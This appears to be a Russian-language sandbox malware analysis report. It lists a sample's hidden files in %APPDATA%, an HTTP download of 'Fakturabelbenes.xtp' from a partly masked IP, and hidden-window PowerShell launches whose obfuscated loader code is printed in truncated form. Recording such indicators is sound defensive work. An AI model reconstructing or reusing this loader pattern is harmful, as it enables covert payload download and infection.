Техническая информация
Изменения в файловой системе
Создает следующие файлы
- %APPDATA%\bita801.tmp
- %APPDATA%\bitfad3.tmp
Присваивает атрибут 'скрытый' для следующих файлов
- %APPDATA%\bita801.tmp
- %APPDATA%\bitfad3.tmp
Перемещает следующие файлы
- %APPDATA%\bita801.tmp в %APPDATA%\ditmargariner.chu
- %APPDATA%\bitfad3.tmp в %APPDATA%\ditmargariner.chu
Сетевая активность
Подключается к
- '85.##9.176.46':80
TCP
Запросы HTTP GET
- http://85.##9.176.46/Fakturabelbenes.xtp
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "dir;Function Bloodsuck9 ($Beboelseslejlighederne){$Eclipsed234=5;$Eclipsed234++;For($Begrlihed=5; $Begrlihed -lt $Beboelseslejlighederne.Length-1; $Begrlihed+=$Eclipsed234){$Amazonjunglen = '...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "dir;Function Bloodsuck9 ($Beboelseslejlighederne){$Eclipsed234=5;$Eclipsed234++;For($Begrlihed=5; $Begrlihed -lt $Beboelseslejlighederne.Length-1; $Begrlihed+=$Eclipsed234){$Amazonjunglen = '...
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' "dir;Function Bloodsuck9 ($Beboelseslejlighederne){$Eclipsed234=5;$Eclipsed234++;For($Begrlihed=5; $Begrlihed -lt $Beboelseslejlighederne.Length-1; $Begrlihed+=$Eclipsed234){$Amazonjunglen = '...
